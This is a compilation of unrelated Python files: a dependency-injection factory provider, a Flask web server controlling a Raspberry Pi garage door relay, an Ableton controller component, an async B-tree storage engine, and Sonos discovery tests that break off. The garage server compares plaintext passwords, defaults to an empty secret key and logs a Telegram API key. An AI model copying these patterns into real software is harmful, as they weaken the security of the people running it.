wired.append(factory.dependency.__call__)
else:
wired.append(factory.function)
return DependencyDebug(debug_repr(dependency),
scope=factory.scope,
wired=wired,
dependencies=dependencies)
def maybe_provide(self, dependency: Hashable, container: Container
) -> Optional[DependencyValue]:
dependency_factory = (dependency.wrapped
if isinstance(dependency, Parameterized)
else dependency)
if not isinstance(dependency_factory, FactoryDependency):
return None
try:
factory = self.__factories[dependency_factory]
except KeyError:
return None
if factory.function is None:
f = container.provide(factory.dependency)
assert f.is_singleton(), "factory dependency is expected to be a singleton"
factory.function = f.unwrapped
if isinstance(dependency, Parameterized):
instance = factory.function(**dependency.parameters)
else:
instance = factory.function()
return DependencyValue(instance, scope=factory.scope)
def register(self,
output: type,
*,
scope: Optional[Scope],
factory: Callable[..., object] = None,
factory_dependency: Hashable = None
) -> 'FactoryDependency':
assert inspect.isclass(output) \
and (factory is None or factory_dependency is None) \
and (factory is None or callable(factory)) \
and (isinstance(scope, Scope) or scope is None)
dependency = FactoryDependency(output, factory or factory_dependency)
self._assert_not_duplicate(dependency)
if factory_dependency:
self.__factories[dependency] = Factory(scope,
dependency=factory_dependency)
else:
self.__factories[dependency] = Factory(scope,
function=factory)
return dependency
@API.private
class FactoryDependency(FinalImmutable):
__slots__ = ('output', 'factory', '__hash')
output: Hashable
factory: object
__hash: int
def __init__(self, output: Hashable, factory: object):
super().__init__(output, factory, hash((output, factory)))
def __repr__(self) -> str:
return f"FactoryDependency({self})"
def __antidote_debug_repr__(self) -> str:
return str(self)
def __str__(self) -> str:
return f"{debug_repr(self.output)} @ {debug_repr(self.factory)}"
# Custom hash & eq necessary to find duplicates
def __hash__(self) -> int:
return self.__hash
def __eq__(self, other: object) -> bool:
return (isinstance(other, FactoryDependency)
and self.__hash == other.__hash
and (self.output is other.output
or self.output == other.output)
and (self.factory is other.factory
or self.factory == other.factory)) # noqa
@API.private
class Factory(SlotRecord):
__slots__ = ('scope', 'function', 'dependency')
scope: Optional[Scope]
function: Callable[..., object]
dependency: Hashable
def __init__(self,
scope: Optional[Scope],
function: Callable[..., object] = None,
dependency: Hashable = None):
assert function is not None or dependency is not None
super().__init__(scope, function, dependency)
def copy(self, keep_function: bool = True) -> 'Factory':
return Factory(self.scope,
self.function if keep_function else None,
self.dependency)
|
142753
|
import logging
from logging.handlers import RotatingFileHandler
import os
import sys
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash, jsonify, has_request_context, send_from_directory, send_file
from common import constants
from common.db import GarageDb
from common.iftt import IftttEvent
from common.telegram import TelegramNotification
from webserver.client_api import GaragePiClient
import time
import csv
# ------------- Setup ------------
# Create our application
app = Flask(__name__, instance_relative_config=True)
# Set up logging
app.logger_name = "WEBSRVR"
file_handler = RotatingFileHandler(os.path.join(app.instance_path, 'garage_webserver.log'),
constants.LOGFILE_MODE, constants.LOGFILE_MAXSIZE,
constants.LOGFILE_BACKUP_COUNT)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(logging.Formatter(constants.LOGFILE_FORMAT))
app.logger.addHandler(file_handler)
app.debug_log_format = '%(relativeCreated)-6d [%(process)-5d:%(thread)#x] %(levelname)-5s %(message)s [in %(module)s @ %(pathname)s:%(lineno)d]'
app.logger.setLevel(logging.DEBUG)
# Log startup
app.logger.info('---------- Starting up!')
app.logger.info('__name__ is \'%s\'' % __name__)
# Load default config and override config from an environment variable
app.config.update(dict(
RELAY_PIN=7,
REED_PIN=18,
DOOR_OPENED=None, # 1 for open, 0 for closed
NEED_CLEANUP=False,
SECRET_KEY='', # should be overwritten by your app config!
))
# Load configuration
resource_path = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0]))) + os.sep + 'resource'
default_cfg_file = os.path.join(resource_path, 'default_app.cfg')
app.logger.debug('Loading default config file from \'%s\'' % default_cfg_file)
app.config.from_pyfile(default_cfg_file)
app.logger.debug('Looking for custom app config in \'%s\'' % os.path.join(app.instance_path, 'app.cfg'))
app.config.from_pyfile('app.cfg')
# -------------- App Context Resources ----------------
def get_api_client() -> GaragePiClient:
"""
Creates a new client api connector if there isn't one created
yet for the current application context.
"""
if not hasattr(g, 'api_client'):
g.api_client = GaragePiClient(app.logger, app.config['IPC_PORT'])
return g.api_client
def get_db() -> GarageDb:
"""
Creates a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = GarageDb(app.instance_path, resource_path)
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
app.logger.debug("Tearing down app context")
if hasattr(g, 'api_client'):
app.logger.debug("Tearing down app context: closing api client")
g.api_client.close()
# -------------- Routes ----------------
@app.route('/')
def show_control():
app.logger.debug('Received request for /')
return render_template('garage_control.html')
@app.route('/trigger', methods=['POST'])
def trigger_openclose():
app.logger.debug('Received POST to trigger')
if not session.get('logged_in'):
app.logger.warning('Refusing to trigger relay because not logged in!')
abort(401)
app.logger.debug('Triggering relay')
get_api_client().trigger_relay(request.headers.get('User-Agent') if has_request_context() else 'SERVER',
app.config['USERNAME']);
app.logger.debug('Relay triggered')
flash('Relay successfully triggered')
return redirect(url_for('show_control'))
@app.route('/crack', methods=['POST'])
def trigger_crack():
app.logger.debug('Received POST to crack')
if not session.get('logged_in'):
app.logger.warning('Refusing to trigger relay because not logged in!')
abort(401)
app.logger.debug('Triggering relay')
get_api_client().trigger_relay(request.headers.get('User-Agent') if has_request_context() else 'SERVER',
app.config['USERNAME']);
app.logger.debug('Relay triggered')
flash('Relay successfully triggered')
crack_delay = app.config['CRACK_DELAY']
time.sleep(crack_delay)
app.logger.debug('Triggering relay')
get_api_client().trigger_relay(request.headers.get('User-Agent') if has_request_context() else 'SERVER',
app.config['USERNAME']);
app.logger.debug('Relay triggered')
flash('Relay successfully triggered')
return redirect(url_for('show_control'))
@app.route('/query_status')
def query_status() -> str:
status = get_api_client().get_status()
if status is None: return "{}"
return jsonify(status)
def get_status():
return get_api_client().get_status()
@app.route('/history')
def show_history():
db = get_db()
entries = db.read_history()
return render_template('history.html', entries=entries)
@app.route('/full_history')
def show_full_history():
db = get_db()
entries = db.read_full_history()
return render_template('full_history.html', entries=entries)
@app.route('/login', methods=['GET', 'POST'])
def login():
error = None
if request.method == 'POST':
if request.form['username'] != app.config['USERNAME']:
error = 'Invalid username'
elif request.form['password'] != app.config['PASSWORD']:
error = 'Invalid password'
else:
session['logged_in'] = True
session.permanent = True
flash('You were logged in')
return redirect(url_for('show_control'))
return render_template('login.html', error=error)
@app.route('/download')
def download():
db = get_db()
entries = db.read_full_history()
filename = 'history.csv'
with open(os.path.join(app.instance_path, filename),'w', newline='') as csv_file:
wr = csv.writer(csv_file, quoting=csv.QUOTE_ALL)
wr.writerow(["Time","Event","Description"])
for row in entries:
wr.writerow(row)
try:
return send_from_directory(os.path.join(app.instance_path), filename, as_attachment=True, attachment_filename=filename)
except:
abort(404)
@app.route('/logout')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('show_control'))
# ----- Tests --------
@app.route('/test_zmq')
def test_zmq():
if not app.debug: return 'Only available when debug is set to True in application config.'
msg = request.args.get('msg')
app.logger.debug("Calling echo with message: {0}".format(msg))
message = get_api_client().echo(msg)
app.logger.debug("Returned from echo: {0}".format(message))
if message is None: return "Received no reply!"
return "Received reply [{0}]".format(message)
@app.route('/test_ifttt')
def test_ifttt():
if not app.debug: return 'Only available when debug is set to True in application config.'
maker_key = app.config['IFTTT_MAKER_KEY']
if not maker_key: return 'No maker key provided!'
event_name = request.args.get('event_name')
# if not event_name: return redirect(url_for('show_control'), code=302)
value1 = request.args.get('value1')
value2 = request.args.get('value2')
value3 = request.args.get('value3')
app.logger.debug("Testing IFTTT with: %r %r %r %r" % (event_name, value1, value2, value3))
event = IftttEvent(maker_key, request.args.get('event_name'), app.logger)
result = event.trigger(value1, value2, value3)
return 'Result: %r' % (result,)
@app.route('/test_telegram')
def test_telegram():
if not app.debug: return 'Only available when debug is set to True in application config.'
telegram_chat_id = str(app.config['APPRISE_TELEGRAM_CHAT_ID'])
telegram_key = str(app.config['APPRISE_TELEGRAM_KEY'])
if not telegram_key: return 'No Telegram key provided!'
app.logger.debug("Testing Telegram with %s and %s" % (telegram_key,telegram_chat_id))
event = TelegramNotification(telegram_key, telegram_chat_id, "Test notification from GaragePi", app.logger)
event.trigger()
return redirect(url_for('show_control'))
|
142783
|
from _Framework.ModesComponent import ModesComponent
class ModesComponentEx(ModesComponent):
"""
A special ModesComponent for the twister that lets us skin the mode buttons
"""
def set_mode_button(self, name, button):
if button:
button.set_on_off_values('Modes.Selected', 'Modes.NotSelected')
super(ModesComponentEx, self).set_mode_button(name, button)
|
142794
|
from asyncio import ensure_future, Lock, sleep, get_event_loop
from bisect import insort, bisect, bisect_left
from collections import UserList
from contextlib import suppress
from multiprocessing import Process
from os import rename, remove
from os.path import getsize, isfile
from pickle import load, UnpicklingError
from struct import pack, unpack
from .Allocator import Allocator
from .AsyncFile import AsyncFile
from .Node import IndexNode, ValueNode
from .TaskQue import TaskQue, Task
class SortedList(UserList):
def append(self, item):
insort(self.data, item)
OP = b'\x00'
ED = b'\x01'
MIN_DEGREE = 128
class BasicEngine:
# 基础事务
def __init__(self, filename: str):
if not isfile(filename):
with open(filename, 'wb') as file:
# indicator
file.write(OP)
# root
file.write(pack('Q', 9))
self.root = IndexNode(is_leaf=True)
self.root.dump(file)
else:
with open(filename, 'rb+') as file:
if file.read(1) == OP:
file.close()
p = Process(target=repair, args=(filename,))
p.start()
p.join()
return self.__init__(filename)
else:
ptr = unpack('Q', file.read(8))[0]
file.seek(ptr)
self.root = IndexNode(file=file)
file.seek(0)
file.write(OP)
self.allocator = Allocator()
self.async_file = AsyncFile(filename)
self.command_que = SortedList()
self.file = open(filename, 'rb+', buffering=0)
self.lock = Lock()
self.on_interval = (0, 1)
self.on_write = False
self.task_que = TaskQue()
def malloc(self, size: int) -> int:
def is_inside(ptr: int) -> bool:
if self.on_write:
begin, end = self.on_interval
return min(ptr + size, end) - max(ptr, begin) >= 0
ptr = self.allocator.malloc(size)
if ptr and is_inside(ptr):
self.free(ptr, size)
ptr = 0
if not ptr:
ptr = self.async_file.size
if is_inside(ptr):
ptr += 1
self.async_file.size += 1
self.async_file.size += size
return ptr
def free(self, ptr: int, size: int):
self.allocator.free(ptr, size)
def time_travel(self, token: Task, node: IndexNode):
address = node.nth_value_ads(0)
for i in range(len(node.ptrs_value)):
ptr = self.task_que.get(token, address, node.ptr)
if ptr:
node.ptrs_value[i] = ptr
address += 8
if not node.is_leaf:
for i in range(len(node.ptrs_child)):
ptr = self.task_que.get(token, address, node.ptr)
if ptr:
node.ptrs_child[i] = ptr
address += 8
def a_command_done(self, token: Task):
token.command_num -= 1
if token.command_num == 0:
self.task_que.clean()
if not self.task_que.que and self.lock.locked():
self.lock.release()
# cumulation
def do_cum(self, token: Task, free_nodes, command_map):
def func():
for node in free_nodes:
self.free(node.ptr, node.size)
token.free_param = func
for ptr, param in command_map.items():
data, depend = param if isinstance(param, tuple) else (param, 0)
self.ensure_write(token, ptr, data, depend)
self.time_travel(token, self.root)
self.root = self.root.clone()
def ensure_write(self, token: Task, ptr: int, data: bytes, depend=0):
async def coro():
while self.command_que:
ptr, token, data, depend = self.command_que.pop(0)
cancel = depend and self.task_que.is_canceled(token, depend)
if not cancel:
cancel = self.task_que.is_canceled(token, ptr)
if not cancel:
# 确保边界不相连
self.on_interval = (ptr - 1, ptr + len(data) + 1)
await self.async_file.write(ptr, data)
self.a_command_done(token)
self.on_write = False
if not self.on_write:
self.on_write = True
ensure_future(coro())
# 按ptr和token.id排序
self.command_que.append((ptr, token, data, depend))
token.command_num += 1
def close(self):
self.file.seek(0)
self.file.write(ED)
self.file.close()
self.async_file.close()
def repair(filename: str):
async def coro():
temp = '__' + filename
engine = Engine(temp)
size = getsize(filename)
with open(filename, 'rb') as file:
file.seek(9)
while file.tell() != size:
indicator = file.read(1)
if indicator != ED:
continue
with suppress(EOFError, UnpicklingError):
item = load(file)
if isinstance(item, tuple) and len(item) == 2:
engine.set(*item)
await sleep(0)
if engine.task_que.que:
await engine.lock.acquire()
await engine.lock.acquire()
engine.close()
remove(filename)
rename(temp, filename)
loop = get_event_loop()
loop.run_until_complete(coro())
class Engine(BasicEngine):
# B-Tree核心
async def get(self, key):
token = self.task_que.create(is_active=False)
token.command_num += 1
async def travel(ptr: int):
init = self.task_que.get(token, ptr, is_active=False)
if not init:
init = await self.async_file.exec(ptr, lambda f: IndexNode(file=f))
index = bisect(init.keys, key)
if init.keys[index - 1] == key:
ptr = self.task_que.get(token, init.nth_value_ads(index - 1), init.ptr) or init.ptrs_value[index - 1]
val = await self.async_file.exec(ptr, lambda f: ValueNode(file=f))
assert val.key == key
self.a_command_done(token)
return val.value
elif not init.is_leaf:
ptr = self.task_que.get(token, init.nth_child_ads(index), init.ptr) or init.ptrs_child[index]
return await travel(ptr)
else:
return self.a_command_done(token)
# root ptrs实时更新
index = bisect(self.root.keys, key)
if index - 1 >= 0 and self.root.keys[index - 1] == key:
ptr = self.root.ptrs_value[index - 1]
val = await self.async_file.exec(ptr, lambda f: ValueNode(file=f))
assert val.key == key
self.a_command_done(token)
return val.value
elif not self.root.is_leaf:
return await travel(self.root.ptrs_child[index])
else:
return self.a_command_done(token)
def set(self, key, value):
token = self.task_que.create(is_active=True)
free_nodes = []
# {..., ptr: data OR (data, depend)}
command_map = {}
def replace(address: int, ptr: int, depend: int):
self.file.seek(ptr)
org_val = ValueNode(file=self.file)
if org_val.value != value:
# 写入新Val
val = ValueNode(key, value)
self.file.seek(self.async_file.size)
val.dump(self.file)
self.async_file.size += val.size
# 状态设为0
self.file.seek(org_val.ptr)
self.file.write(OP)
# 释放
free_nodes.append(org_val)
# 同步
self.task_que.set(token, address, org_val.ptr, val.ptr)
# 命令
self.ensure_write(token, address, pack('Q', val.ptr), depend)
self.do_cum(token, free_nodes, command_map)
def split(address: int, par: IndexNode, child_index: int, child: IndexNode, depend: int):
org_par = par.clone()
org_child = child.clone()
# 一半数据给sibling
mi = (len(child.keys) - 1) // 2 + 1
sibling = IndexNode(is_leaf=child.is_leaf)
sibling.keys = child.keys[mi:]
sibling.ptrs_value = child.ptrs_value[mi:]
del child.keys[mi:]
del child.ptrs_value[mi:]
if not sibling.is_leaf:
sibling.ptrs_child = child.ptrs_child[mi:]
del child.ptrs_child[mi:]
# parent需一个值
par.keys.insert(child_index, child.keys.pop())
par.ptrs_value.insert(child_index, child.ptrs_value.pop())
# 分配空间
child_b = bytes(child)
sibling_b = bytes(sibling)
child.ptr = self.malloc(child.size)
sibling.ptr = self.malloc(sibling.size)
par.ptrs_child[child_index] = child.ptr
par.ptrs_child.insert(child_index + 1, sibling.ptr)
par_b = bytes(par)
par.ptr = self.malloc(par.size)
# 更新完毕
# 释放
free_nodes.extend((org_par, org_child))
# 同步
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (org_child.ptr, org_child, _),
(par.ptr, _, par), (child.ptr, _, child), (sibling.ptr, _, sibling)):
self.task_que.set(token, ptr, head, tail)
# 命令
command_map.update({address: (pack('Q', par.ptr), depend),
par.ptr: par_b, child.ptr: child_b, sibling.ptr: sibling_b})
cursor = self.root
address = 1
depend = 0
# root准满载
if len(cursor.keys) == 2 * MIN_DEGREE - 1:
# 新建root
root = IndexNode(is_leaf=False)
root.ptrs_child.append(self.root.ptr)
split(address, root, 0, self.root, depend)
self.root = cursor = root
index = bisect(cursor.keys, key)
# 检查key是否已存在
if cursor.keys and cursor.keys[index - 1] == key:
return replace(cursor.nth_value_ads(index - 1), cursor.ptrs_value[index - 1], cursor.ptr)
# 向下循环直到叶节点
while not cursor.is_leaf:
index = bisect(cursor.keys, key)
ptr = cursor.ptrs_child[index]
child = self.task_que.get(token, ptr)
if not child:
self.file.seek(ptr)
child = IndexNode(file=self.file)
self.time_travel(token, child)
i = bisect_left(child.keys, key)
if i < len(child.keys) and child.keys[i] == key:
return replace(child.nth_value_ads(i), child.ptrs_value[i], child.ptr)
if len(child.keys) == 2 * MIN_DEGREE - 1:
split(address, cursor, index, child, depend)
if cursor.keys[index] < key:
# 路径转移至sibling,且必存在于task_que
index += 1
ptr = cursor.ptrs_child[index]
child = self.task_que.get(token, ptr)
address = cursor.nth_child_ads(index)
depend = cursor.ptr
cursor = child
# 到达叶节点
val = ValueNode(key, value)
val_b = bytes(val)
val.ptr = self.malloc(val.size)
self.file.seek(val.ptr)
self.file.write(val_b)
org_cursor = cursor.clone()
index = bisect(cursor.keys, key)
cursor.keys.insert(index, val.key)
cursor.ptrs_value.insert(index, val.ptr)
cursor_b = bytes(cursor)
cursor.ptr = self.malloc(cursor.size)
# 更新完毕
# 释放
free_nodes.append(org_cursor)
# 同步
_ = None
for ptr, head, tail in ((address, org_cursor.ptr, cursor.ptr),
(org_cursor.ptr, org_cursor, _), (cursor.ptr, _, cursor)):
self.task_que.set(token, ptr, head, tail)
# 命令
command_map.update({address: (pack('Q', cursor.ptr), depend), cursor.ptr: cursor_b})
self.do_cum(token, free_nodes, command_map)
def pop(self, key):
token = self.task_que.create(is_active=True)
free_nodes = []
command_map = {}
def indicate(val: ValueNode):
self.file.seek(val.ptr)
self.file.write(OP)
free_nodes.append(val)
def fetch(ptr: int) -> IndexNode:
result = self.task_que.get(token, ptr)
if not result:
self.file.seek(ptr)
result = IndexNode(file=self.file)
self.time_travel(token, result)
return result
def left_to_right(address: int, par: IndexNode, val_index: int,
left_child: IndexNode, right_child: IndexNode, depend: int):
org_par = par.clone()
org_left = left_child.clone()
org_right = right_child.clone()
# 内存
last_val_key = left_child.keys.pop()
last_val_ptr = left_child.ptrs_value.pop()
val_key = par.keys[val_index]
val_ptr = par.ptrs_value[val_index]
par.keys[val_index] = last_val_key
par.ptrs_value[val_index] = last_val_ptr
right_child.keys.insert(0, val_key)
right_child.ptrs_value.insert(0, val_ptr)
if not left_child.is_leaf:
last_ptr_child = left_child.ptrs_child.pop()
right_child.ptrs_child.insert(0, last_ptr_child)
# 空间
left_b = bytes(left_child)
right_b = bytes(right_child)
left_child.ptr = self.malloc(left_child.size)
right_child.ptr = self.malloc(right_child.size)
par.ptrs_child[val_index] = left_child.ptr
par.ptrs_child[val_index + 1] = right_child.ptr
par_b = bytes(par)
par.ptr = self.malloc(par.size)
# 更新完毕
# 释放
free_nodes.extend((org_par, org_left, org_right))
# 同步
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (par.ptr, _, par),
(org_left.ptr, org_left, _), (left_child.ptr, _, left_child),
(org_right.ptr, org_right, _), (right_child.ptr, _, right_child)):
self.task_que.set(token, ptr, head, tail)
# 命令
command_map.update({address: (pack('Q', par.ptr), depend),
par.ptr: par_b, left_child.ptr: left_b, right_child.ptr: right_b})
def right_to_left(address: int, par: IndexNode, val_index: int,
left_child: IndexNode, right_child: IndexNode, depend: int):
org_par = par.clone()
org_left = left_child.clone()
org_right = right_child.clone()
# 内存
first_val_key = right_child.keys.pop(0)
first_val_ptr = right_child.ptrs_value.pop(0)
val_key = par.keys[val_index]
val_ptr = par.ptrs_value[val_index]
par.keys[val_index] = first_val_key
par.ptrs_value[val_index] = first_val_ptr
left_child.keys.append(val_key)
left_child.ptrs_value.append(val_ptr)
if not right_child.is_leaf:
first_ptr_child = right_child.ptrs_child.pop(0)
left_child.ptrs_child.append(first_ptr_child)
# 空间
left_b = bytes(left_child)
right_b = bytes(right_child)
left_child.ptr = self.malloc(left_child.size)
right_child.ptr = self.malloc(right_child.size)
par.ptrs_child[val_index] = left_child.ptr
par.ptrs_child[val_index + 1] = right_child.ptr
par_b = bytes(par)
par.ptr = self.malloc(par.size)
# 更新完毕
# 释放
free_nodes.extend((org_par, org_left, org_right))
# 同步
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (par.ptr, _, par),
(org_left.ptr, org_left, _), (left_child.ptr, _, left_child),
(org_right.ptr, org_right, _), (right_child.ptr, _, right_child)):
self.task_que.set(token, ptr, head, tail)
# 命令
command_map.update({address: (pack('Q', par.ptr), depend),
par.ptr: par_b, left_child.ptr: left_b, right_child.ptr: right_b})
def merge_left(address: int, par: IndexNode, val_index: int,
left_child: IndexNode, cursor: IndexNode, depend: int):
org_par = par.clone()
org_cursor = cursor.clone()
# 内存
val_key = par.keys.pop(val_index)
val_ptr = par.ptrs_value.pop(val_index)
del par.ptrs_child[val_index]
cursor.keys = [*left_child.keys, val_key, *cursor.keys]
cursor.ptrs_value = [*left_child.ptrs_value, val_ptr, *cursor.ptrs_value]
if not left_child.is_leaf:
cursor.ptrs_child = [*left_child.ptrs_child, *cursor.ptrs_child]
# 空间
cursor_b = bytes(cursor)
cursor.ptr = self.malloc(cursor.size)
par.ptrs_child[val_index] = cursor.ptr
par_b = bytes(par)
par.ptr = self.malloc(par.size)
# 更新完毕
# 释放
free_nodes.extend((org_par, org_cursor, left_child))
# 同步
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (par.ptr, _, par),
(org_cursor.ptr, org_cursor, _), (cursor.ptr, _, cursor),
(left_child.ptr, left_child, _)):
self.task_que.set(token, ptr, head, tail)
# 命令
command_map.update({address: (pack('Q', par.ptr), depend), par.ptr: par_b, cursor.ptr: cursor_b})
def merge_right(address: int, par: IndexNode, val_index: int,
cursor: IndexNode, right_child: IndexNode, depend: int):
org_par = par.clone()
org_cursor = cursor.clone()
# 内存
val_key = par.keys.pop(val_index)
val_ptr = par.ptrs_value.pop(val_index)
del par.ptrs_child[val_index + 1]
cursor.keys.extend((val_key, *right_child.keys))
cursor.ptrs_value.extend((val_ptr, *right_child.ptrs_value))
if not cursor.is_leaf:
cursor.ptrs_child.extend(right_child.ptrs_child)
# 空间
cursor_b = bytes(cursor)
cursor.ptr = self.malloc(cursor.size)
par.ptrs_child[val_index] = cursor.ptr
par_b = bytes(par)
par.ptr = self.malloc(par.size)
# 更新完毕
# 释放
free_nodes.extend((org_par, org_cursor, right_child))
# 同步
_ = None
for ptr, head, tail in ((address, org_par.ptr, par.ptr),
(org_par.ptr, org_par, _), (par.ptr, _, par),
(org_cursor.ptr, org_cursor, _), (cursor.ptr, _, cursor),
(right_child.ptr, right_child, _)):
self.task_que.set(token, ptr, head, tail)
# 命令
command_map.update({address: (pack('Q', par.ptr), depend), par.ptr: par_b, cursor.ptr: cursor_b})
def travel(address: int, init: IndexNode, key, depend: int):
index = bisect(init.keys, key) - 1
def key_in_leaf():
org_init = init.clone()
self.file.seek(init.ptrs_value[index])
val = ValueNode(file=self.file)
# 内存
del init.keys[index]
del init.ptrs_value[index]
# 空间
init_b = bytes(init)
init.ptr = self.malloc(init.size)
# 释放
indicate(val)
free_nodes.append(org_init)
# 同步
_ = None
for ptr, head, tail in ((address, org_init.ptr, init.ptr),
(org_init.ptr, org_init, _), (init.ptr, _, init)):
self.task_que.set(token, ptr, head, tail)
# 命令
command_map.update({address: (pack('Q', init.ptr), depend), init.ptr: init_b})
return val.value
def root_empty(successor: IndexNode):
free_nodes.append(self.root)
_ = None
for ptr, head, tail in ((address, self.root.ptr, successor.ptr),
(self.root.ptr, self.root, _), (successor.ptr, _, successor)):
self.task_que.set(token, ptr, head, tail)
command_map[address] = pack('Q', successor.ptr)
self.root = successor
# 已定位
if index >= 0 and init.keys[index] == key:
# 位于叶节点
if init.is_leaf:
return key_in_leaf()
# 位于内部节点
else:
left_ptr = init.ptrs_child[index]
left_child = fetch(left_ptr)
right_ptr = init.ptrs_child[index + 1]
right_child = fetch(right_ptr)
# 左 >= t
if len(left_child.keys) >= MIN_DEGREE:
left_to_right(address, init, index, left_child, right_child, depend)
return travel(init.nth_child_ads(index + 1), right_child, key, init.ptr)
# 右 >= t
elif len(right_child.keys) >= MIN_DEGREE:
right_to_left(address, init, index, left_child, right_child, depend)
return travel(init.nth_child_ads(index), left_child, key, init.ptr)
# 左右均 < t
else:
merge_left(address, init, index, left_child, right_child, depend)
if len(self.root.keys) == 0:
root_empty(right_child)
return travel(init.nth_child_ads(index), right_child, key, init.ptr)
# 向下寻找
elif not init.is_leaf:
index += 1
ptr = init.ptrs_child[index]
cursor = fetch(ptr)
# 目标 < t
if len(cursor.keys) < MIN_DEGREE:
left_sibling = right_sibling = None
if index - 1 >= 0:
left_ptr = init.ptrs_child[index - 1]
left_sibling = fetch(left_ptr)
# 左 >= t
if len(left_sibling.keys) >= MIN_DEGREE:
left_to_right(address, init, index - 1, left_sibling, cursor, depend)
return travel(init.nth_child_ads(index), cursor, key, init.ptr)
if index + 1 < len(init.ptrs_child):
right_ptr = init.ptrs_child[index + 1]
right_sibling = fetch(right_ptr)
# 右 >= t
if len(right_sibling.keys) >= MIN_DEGREE:
right_to_left(address, init, index, cursor, right_sibling, depend)
return travel(init.nth_child_ads(index), cursor, key, init.ptr)
# 无 >= t
if left_sibling:
index -= 1
merge_left(address, init, index, left_sibling, cursor, depend)
else:
merge_right(address, init, index, cursor, right_sibling, depend)
if len(self.root.keys) == 0:
root_empty(cursor)
return travel(init.nth_child_ads(index), cursor, key, init.ptr)
travel(1, self.root, key, 0)
self.do_cum(token, free_nodes, command_map)
async def items(self, item_from=None, item_to=None, max_len=0, reverse=False):
assert item_from <= item_to if item_from and item_to else True
token = self.task_que.create(is_active=False)
token.command_num += 1
result = []
async def travel(init: IndexNode):
async def get_item(index: int):
ptr = init.ptrs_value[index]
val = await self.async_file.exec(ptr, lambda f: ValueNode(file=f))
return val.key, val.value
async def get_child(index: int) -> IndexNode:
ptr = init.ptrs_child[index]
child = self.task_que.get(token, ptr, is_active=False)
if not child:
child = await self.async_file.exec(ptr, lambda f: IndexNode(file=f))
self.time_travel(token, child)
return child
# lo_key >= item_from
# hi_key > item_to
lo = 0 if item_from is None else bisect_left(init.keys, item_from)
hi = len(init.keys) if item_to is None else bisect(init.keys, item_to)
extend = not init.is_leaf and (item_from is None or lo == len(init.keys) or init.keys[lo] > item_from)
if not reverse and extend:
await travel(await get_child(lo))
for i in range(lo, hi) if not reverse else reversed(range(lo, hi)):
if reverse and not init.is_leaf:
await travel(await get_child(i + 1))
if max_len and len(result) >= max_len:
return
item = await get_item(i)
result.append(item)
if not reverse and not init.is_leaf:
await travel(await get_child(i + 1))
if reverse and extend:
await travel(await get_child(lo))
await travel(self.root)
self.a_command_done(token)
return result
|
142832
|
import socket
import select
import ipaddress
import ifaddr
from collections import OrderedDict
from unittest.mock import patch, MagicMock as Mock, PropertyMock, call
from soco import discover
from soco import config
from soco.discovery import (
any_soco,
by_name,
_find_ipv4_addresses,
_find_ipv4_networks,
_check_ip_and_port,
_is_sonos,
_sonos_scan_worker_thread,
scan_network,
)
IP_ADDR = "192.168.1.101"
TIMEOUT = 5
class TestDiscover:
def test_discover(self, monkeypatch):
# Create a fake socket, whose data is always a certain string
monkeypatch.setattr("socket.socket", Mock())
sock = socket.socket.return_value
sock.recvfrom.return_value = (
b"SERVER: Linux UPnP/1.0 Sonos/26.1-76230 (ZPS3)",
[IP_ADDR],
) # (data, # address)
# Return a couple of IP addresses from _find_ipv4_addresses()
monkeypatch.setattr(
"soco.discovery._find_ipv4_addresses",
Mock(return_value={"192.168.0.15", "192.168.1.16"}),
)
# Prevent creation of soco instances
monkeypatch.setattr("soco.config.SOCO_CLASS", Mock())
# Fake return value for select
monkeypatch.setattr("select.select", Mock(return_value=([sock], 1, 1)))
# Set timeout
TIMEOUT = 2
discover(timeout=TIMEOUT)
# 6 packets in total should be sent (3 to
# 192.168.0.15 and 3 to 192.168.1.16)
assert sock.sendto.call_count == 6
# select called with the relevant timeout
select.select.assert_called_with([sock, sock], [], [], min(TIMEOUT, 0.1))
# SoCo should be created with the IP address received
config.SOCO_CLASS.assert_called_with(IP_ADDR)
# Now test include_visible parameter. include_invisible=True should
# result in calling SoCo.all_zones etc
# Reset gethostbyname, to always return the same value
monkeypatch.setattr("socket.gethostbyname", Mock(return_value="192.168.1.15"))
config.SOCO_CLASS.return_value = Mock(all_zones="ALL", visible_zones="VISIBLE")
assert discover(include_invisible=True) == "ALL"
assert discover(include_invisible=False) == "VISIBLE"
# If select does not return within timeout SoCo should not be called
# at all
# Simulate no data being returned within timeout
select.select.return_value = (0, 1, 1)
discover(timeout=1)
# Check no SoCo instance created
config.SOCO_CLASS.assert_not_called
def test_by_name():
"""Test the by_name method"""
devices = set()
for name in ("fake", "non", "Kitchen"):
mymock = Mock(player_name=name)
devices.add(mymock)
# The mock we want to find is the last one
mock_to_be_found = mymock
# Patch out discover and test
with patch("soco.discovery.discover") as discover_:
discover_.return_value = devices
# Test not found
device = by_name("Living Room")
assert device is None
discover_.assert_called_once_with(allow_network_scan=False)
# Test found
device = by_name("Kitchen")
assert device is mock_to_be_found
discover_.assert_has_calls(
[call(allow_network_scan=False), call(allow_network_scan=False)]
)
# Tests for scan_network()
def test__find_ipv4_networks(monkeypatch):
_set_up_adapters(monkeypatch)
# Check that we get the expected networks; test different min_netmask values
assert ipaddress.ip_network("192.168.0.55/24", False) in _find_ipv4_networks(24)
assert ipaddress.ip_network("192.168.1.1/24", False) in _find_ipv4_networks(24)
assert ipaddress.ip_network("192.168.1.1/16", False) not in _find_ipv4_networks(24)
assert ipaddress.ip_network("192.168.1.1/16", False) in _find_ipv4_networks(16)
assert ipaddress.ip_network("192.168.1.1/16", False) in _find_ipv4_networks(0)
assert ipaddress.ip_network("192.168.3.11/8", False) not in _find_ipv4_networks(8)
assert ipaddress.ip_network("127.0.0.1/24", False) not in _find_ipv4_networks(24)
assert ipaddress.ip_network("169.254.1.10/16", False) not in _find_ipv4_networks(16)
def test__find_ipv4_addresses(monkeypatch):
